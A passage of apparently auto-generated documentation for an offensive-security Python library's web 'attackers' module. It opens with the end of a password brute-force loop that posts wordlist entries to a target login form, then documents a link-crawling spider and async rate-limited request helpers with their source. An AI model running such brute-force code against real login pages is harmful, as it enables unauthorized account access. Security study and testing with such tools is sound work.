    if os.path.isfile(wordlist_file):
        print(BRIGHT_WHITE + '[*] Wordlist File Found! Starting Bruteforce Attack!!')
        with open(wordlist_file,'r') as wordlist:
            for word in wordlist:
                password = word.strip()
                post_values['password'] = password
                post_response = requests.post(target_url, data=post_values)
                content = str(post_response.content)
                if "Login failed" not in content:
                    print(BRIGHT_YELLOW + '[*] Password Found! : ' + password)
                    sys.exit()

        print(BRIGHT_RED + '[!] Password Not Found!')

    else:
        print(BRIGHT_RED + '[-] Wordlist Not Found.')

Spider

Spider

class Spider used to extract links from website's webpage

Source code in pyhtools\attackers\web\spider.py
class Spider:
    '''
    class Spider used to extract links from website's webpage
    '''
    def __init__(self, rate_limit:int=100, delay:int=0.0001, headers:dict=None) -> None:
        '''
        Spider constructor

        Args:
            rate_limit (int): number of concurrent requests at the same time 
            delay (float): delay between consecutive requests 
            headers (dict): overrides default headers while sending HTTP requests 

        Returns:
            None
        '''
        # list to save links on the whole webpage
        # to avoid repetition
        self.target_links = set()
        self._client = AsyncRLRequests(rate_limit=rate_limit, delay=delay, headers=headers)

    async def get_links(self, url: str) -> set:
        '''extracts links from the whole webpage

        Args: 
            url (str): URL of the webpage

        Returns: 
            list: list of links present in the webpage
        '''
        response = await self._client.request(url=url)
        html = response.get('res_body')
        if html is None:
            return set()

        soup = BeautifulSoup(html, 'html.parser')

        href_links = set()
        for link in soup.find_all(href=True):
            href_link = link.get('href')
            if href_link:
                href_links.add(href_link)

        return href_links

    async def get_target_links(self, url: str, print_link: bool = True):
        '''extracts useful links and prints them which are
        only related to the target webpage

        Args: 
            links (list): list of all links from the target webpage

        Returns:
            list: returns useful links list related to target webpage
        '''
        # extract links from page
        links:set = await self.get_links(url)

        new_links = set()
        for link in links:
            link = urljoin(url, link)

            if '#' in link:
                link = link.split('#')[0]

            if link not in self.target_links and url in link:
                link = unescape(link)
                new_links.add(link)

                if print_link:
                    print(link)

        return new_links

    async def start(self, target_url:str, print_links: bool = True):
        '''starts spider

        Args:
            target_url (str): URL of the target website
            print_links (bool): if True prints links found on console

        Returns:
            list: list of links found by spider
        '''
        queue = [target_url]
        while queue:
            # extract a link from queue
            current_url = queue.pop(0)

            # continue if url is already visited
            if current_url in self.target_links:
                continue

            # add url to visited set
            self.target_links.add(current_url)

            # skip scraping static files since it'll slow down process
            if current_url.endswith(('.css', '.js','.jpeg', '.png','.svg')):
                continue

            # get links from 
            links = await self.get_target_links(current_url, print_link=print_links)

            # add new links to queue
            queue.extend(links - self.target_links)

        return self.target_links

__init__(rate_limit=100, delay=0.0001, headers=None)

Spider constructor

Parameters:

Name Type Description Default
rate_limit int

number of concurrent requests at the same time

100
delay float

delay between consecutive requests

0.0001
headers dict

overrides default headers while sending HTTP requests

None

Returns:

Type Description
None

None

Source code in pyhtools\attackers\web\spider.py
def __init__(self, rate_limit:int=100, delay:int=0.0001, headers:dict=None) -> None:
    '''
    Spider constructor

    Args:
        rate_limit (int): number of concurrent requests at the same time 
        delay (float): delay between consecutive requests 
        headers (dict): overrides default headers while sending HTTP requests 

    Returns:
        None
    '''
    # list to save links on the whole webpage
    # to avoid repetition
    self.target_links = set()
    self._client = AsyncRLRequests(rate_limit=rate_limit, delay=delay, headers=headers)

extracts links from the whole webpage

Parameters:

Name Type Description Default
url str

URL of the webpage

required

Returns:

Name Type Description
list set

list of links present in the webpage

Source code in pyhtools\attackers\web\spider.py
async def get_links(self, url: str) -> set:
    '''extracts links from the whole webpage

    Args: 
        url (str): URL of the webpage

    Returns: 
        list: list of links present in the webpage
    '''
    response = await self._client.request(url=url)
    html = response.get('res_body')
    if html is None:
        return set()

    soup = BeautifulSoup(html, 'html.parser')

    href_links = set()
    for link in soup.find_all(href=True):
        href_link = link.get('href')
        if href_link:
            href_links.add(href_link)

    return href_links

extracts useful links and prints them which are only related to the target webpage

Parameters:

Name Type Description Default
links list

list of all links from the target webpage

required

Returns:

Name Type Description
list

returns useful links list related to target webpage

Source code in pyhtools\attackers\web\spider.py
async def get_target_links(self, url: str, print_link: bool = True):
    '''extracts useful links and prints them which are
    only related to the target webpage

    Args: 
        links (list): list of all links from the target webpage

    Returns:
        list: returns useful links list related to target webpage
    '''
    # extract links from page
    links:set = await self.get_links(url)

    new_links = set()
    for link in links:
        link = urljoin(url, link)

        if '#' in link:
            link = link.split('#')[0]

        if link not in self.target_links and url in link:
            link = unescape(link)
            new_links.add(link)

            if print_link:
                print(link)

    return new_links

start(target_url, print_links=True) async

starts spider

Parameters:

Name Type Description Default
target_url str

URL of the target website

required
print_links bool

if True prints links found on console

True

Returns:

Name Type Description
list

list of links found by spider

Source code in pyhtools\attackers\web\spider.py
async def start(self, target_url:str, print_links: bool = True):
    '''starts spider

    Args:
        target_url (str): URL of the target website
        print_links (bool): if True prints links found on console

    Returns:
        list: list of links found by spider
    '''
    queue = [target_url]
    while queue:
        # extract a link from queue
        current_url = queue.pop(0)

        # continue if url is already visited
        if current_url in self.target_links:
            continue

        # add url to visited set
        self.target_links.add(current_url)

        # skip scraping static files since it'll slow down process
        if current_url.endswith(('.css', '.js','.jpeg', '.png','.svg')):
            continue

        # get links from 
        links = await self.get_target_links(current_url, print_link=print_links)

        # add new links to queue
        queue.extend(links - self.target_links)

    return self.target_links

Utils

AsyncRLRequests

Bases: AsyncRequests

Send Asynchronous rate limited HTTP requests.

Source code in pyhtools\attackers\web\utils.py
class AsyncRLRequests(AsyncRequests):
    '''
    Send Asynchronous rate limited HTTP requests.
    '''

    def __init__(self, rate_limit: int = 20, delay: float = 0.05, headers: dict = None) -> None:
        '''AsyncRLRequests constructor

        Args:
            rate_limit (int): number of concurrent requests at the same time
            delay (float): delay between consecutive requests
            headers (dict): overrides default headers while sending HTTP requests

        Returns:
            None
        '''
        assert isinstance(delay, float) or isinstance(delay, int)
        assert isinstance(rate_limit, float) or isinstance(rate_limit, int)

        self._delay = delay
        self._semaphore = asyncio.Semaphore(rate_limit)
        super().__init__(headers)

    async def request(self, url: str, method: str = 'GET', session: ClientSession = None, *args, **kwargs) -> ClientResponse:
        '''Send HTTP requests asynchronously with rate limit and delay between the requests

        Args:
            url (str): URL of the webpage/endpoint
            method (str): HTTP methods (default: GET) supports GET, POST, 
            PUT, HEAD, OPTIONS, DELETE
            session (aiohttp.ClientSession): aiohttp Client Session for sending requests

        Returns:
            dict: returns request and response data as dict
        '''
        async with self._semaphore:
            response = await super().request(url, method, session, *args, **kwargs)
            await asyncio.sleep(self._delay)
            return response

__init__(rate_limit=20, delay=0.05, headers=None)

AsyncRLRequests constructor

Parameters:

Name Type Description Default
rate_limit int

number of concurrent requests at the same time

20
delay float

delay between consecutive requests

0.05
headers dict

overrides default headers while sending HTTP requests

None

Returns:

Type Description
None

None

Source code in pyhtools\attackers\web\utils.py
def __init__(self, rate_limit: int = 20, delay: float = 0.05, headers: dict = None) -> None:
    '''AsyncRLRequests constructor

    Args:
        rate_limit (int): number of concurrent requests at the same time
        delay (float): delay between consecutive requests
        headers (dict): overrides default headers while sending HTTP requests

    Returns:
        None
    '''
    assert isinstance(delay, float) or isinstance(delay, int)
    assert isinstance(rate_limit, float) or isinstance(rate_limit, int)

    self._delay = delay
    self._semaphore = asyncio.Semaphore(rate_limit)
    super().__init__(headers)

request(url, method='GET', session=None, *args, **kwargs) async

Send HTTP requests asynchronously with rate limit and delay between the requests

Parameters:

Name Type Description Default
url str

URL of the webpage/endpoint

required
method str

HTTP methods (default: GET) supports GET, POST,

'GET'
session aiohttp.ClientSession

aiohttp Client Session for sending requests

None

Returns:

Name Type Description
dict ClientResponse

returns request and response data as dict

Source code in pyhtools\attackers\web\utils.py
async def request(self, url: str, method: str = 'GET', session: ClientSession = None, *args, **kwargs) -> ClientResponse:
    '''Send HTTP requests asynchronously with rate limit and delay between the requests

    Args:
        url (str): URL of the webpage/endpoint
        method (str): HTTP methods (default: GET) supports GET, POST, 
        PUT, HEAD, OPTIONS, DELETE
        session (aiohttp.ClientSession): aiohttp Client Session for sending requests

    Returns:
        dict: returns request and response data as dict
    '''
    async with self._semaphore:
        response = await super().request(url, method, session, *args, **kwargs)
        await asyncio.sleep(self._delay)
        return response

AsyncRequests

AsyncRequests class helps to send HTTP requests.

Source code in pyhtools\attackers\web\utils.py
class AsyncRequests:
    '''
    AsyncRequests class helps to send HTTP requests.
    '''

    def __init__(self, headers: dict = None) -> None:
        '''AsyncRequests class constructor

        Args:
            headers (dict): overrides default headers while sending HTTP requests

        Returns:
            None
        '''
        self._headers = headers

    async def request(self, url: str, method: str = 'GET', session: ClientSession = None, *args, **kwargs) -> ClientResponse:
        '''Send HTTP requests asynchronously

        Args:
            url (str): URL of the webpage/endpoint
            method (str): HTTP methods (default: GET) supports GET, POST, 
            PUT, HEAD, OPTIONS, DELETE
            session (aiohttp.ClientSession): aiohttp Client Session for sending requests

        Returns:
            dict: returns request and response data as dict
        '''
        is_new_session = False
        if not session:
            session = ClientSession(headers=self._headers)
            is_new_session = True

        method = str(method).upper()
        match method:
            case 'GET':
                sent_req = session.get(url, *args, **kwargs)
            case 'POST':
                sent_req = session.post(url, *args, **kwargs)
            case 'PUT':
                sent_req = session.put(url, *args, **kwargs)
            case 'PATCH':
                sent_req = session.patch(url, *args, **kwargs)
            case 'HEAD':
                sent_req = session.head(url, *args, **kwargs)
            case 'OPTIONS':
                sent_req = session.options(url, *args, **kwargs)
            case 'DELETE':
                sent_req = session.delete(url, *args, **kwargs)


        resp_data = None
        async with sent_req as response:
            resp_data = {
                        "status": response.status,
                        "req_url": str(response.request_info.real_url),
                        "req_method": response.request_info.method,
                        "req_headers": dict(**response.request_info.headers),
                        "res_redirection": str(response.history),
                        "res_headers": dict(response.headers),
                        "res_body": await response.text(),
                    }
            if is_new_session:
                await session.close()

        return resp_data

__init__(headers=None)

AsyncRequests class constructor

Parameters:

Name Type Description Default
headers dict

overrides default headers while sending HTTP requests

None

Returns:

Type Description
None

None

Source code in pyhtools\attackers\web\utils.py
def __init__(self, headers: dict = None) -> None:
    '''AsyncRequests class constructor

    Args:
        headers (dict): overrides default headers while sending HTTP requests

    Returns:
        None
    '''
    self._headers = headers

request(url, method='GET', session=None, *args, **kwargs) async

Send HTTP requests asynchronously

Parameters:

Name Type Description Default
url str

URL of the webpage/endpoint

required
method str

HTTP methods (default: GET) supports GET, POST,

'GET'
session aiohttp.ClientSession

aiohttp Client Session for sending requests

None

Returns:

Name Type Description
dict ClientResponse

returns request and response data as dict

Source code in pyhtools\attackers\web\utils.py
async def request(self, url: str, method: str = 'GET', session: ClientSession = None, *args, **kwargs) -> ClientResponse:
    '''Send HTTP requests asynchronously

    Args:
        url (str): URL of the webpage/endpoint
        method (str): HTTP methods (default: GET) supports GET, POST, 
        PUT, HEAD, OPTIONS, DELETE
        session (aiohttp.ClientSession): aiohttp Client Session for sending requests

    Returns:
        dict: returns request and response data as dict
    '''
    is_new_session = False
    if not session:
        session = ClientSession(headers=self._headers)
        is_new_session = True

    method = str(method).upper()
    match method:
        case 'GET':
            sent_req = session.get(url, *args, **kwargs)
        case 'POST':
            sent_req = session.post(url, *args, **kwargs)
        case 'PUT':
            sent_req = session.put(url, *args, **kwargs)
        case 'PATCH':
            sent_req = session.patch(url, *args, **kwargs)
        case 'HEAD':
            sent_req = session.head(url, *args, **kwargs)
        case 'OPTIONS':
            sent_req = session.options(url, *args, **kwargs)
        case 'DELETE':
            sent_req = session.delete(url, *args, **kwargs)


    resp_data = None
    async with sent_req as response:
        resp_data = {
                    "status": response.status,
                    "req_url": str(response.request_info.real_url),
                    "req_method": response.request_info.method,
                    "req_headers": dict(**response.request_info.headers),
                    "res_redirection": str(response.history),
                    "res_headers": dict(response.headers),
                    "res_body": await response.text(),
                }
        if is_new_session:
            await session.close()

    return resp_data